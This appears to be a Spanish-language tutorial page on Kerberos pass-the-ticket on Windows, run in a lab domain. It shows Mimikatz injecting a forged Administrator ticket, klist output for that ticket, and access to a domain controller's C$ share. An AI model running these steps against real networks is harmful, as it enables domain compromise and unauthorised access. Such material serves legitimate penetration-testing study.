PTT en Windows
La principal diferencia entre implementar PTT en Windows y Linux/Unix radica en el manejo de los tickets y las herramientas utilizadas. En Windows, Mimikatz maneja directamente la extracción e inyección de tickets. En cambio, en Linux/Unix, se requiere un paso adicional para convertir el ticket a un formato compatible y luego utilizar herramientas nativas de Kerberos para su uso.
PS C:\Users\admin\Desktop\SHARED> .\mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 Aug 10 2021 17:19:53
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
## \ / ## > https://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( [email protected] )
'#####' > https://pingcastle.com / https://mysmartlogon.com ***/
mimikatz # kerberos::ptt evil.tck
* File: 'evil.tck': OK
mimikatz # exit
Bye!Despues de ejecutar lo anterior, podemos interactuar con los permisos de este ticket:
PS C:\Users\admin\Desktop\SHARED> klist
Current LogonId is 0:0x42e63
Cached Tickets: (1)
#0> Client: Administrator @ spartancybersec.corp
Server: krbtgt/spartancybersec.corp @ spartancybersec.corp
KerbTicket Encryption Type: RSADSI RC4-HMAC(NT)
Ticket Flags 0x40e00000 -> forwardable renewable initial pre_authent
Start Time: 11/23/2023 14:40:54 (local)
End Time: 11/20/2033 14:40:54 (local)
Renew Time: 11/20/2033 14:40:54 (local)
Session Key Type: RSADSI RC4-HMAC(NT)
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
PS C:\Users\admin\Desktop\SHARED> dir \\First-DC.spartancybersec.corp\c$
Directory: \\First-DC.spartancybersec.corp\c$
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/14/2018 6:56 AM EFI
d----- 11/18/2023 4:22 PM NTDS
d----- 5/13/2020 5:58 PM PerfLogs
d-r--- 9/19/2022 11:23 PM Program Files
d----- 9/19/2022 11:47 PM Program Files (x86)
d-r--- 9/19/2022 11:40 PM Users
d----- 11/23/2023 11:42 PM WindowsÚltima actualización
¿Te fue útil?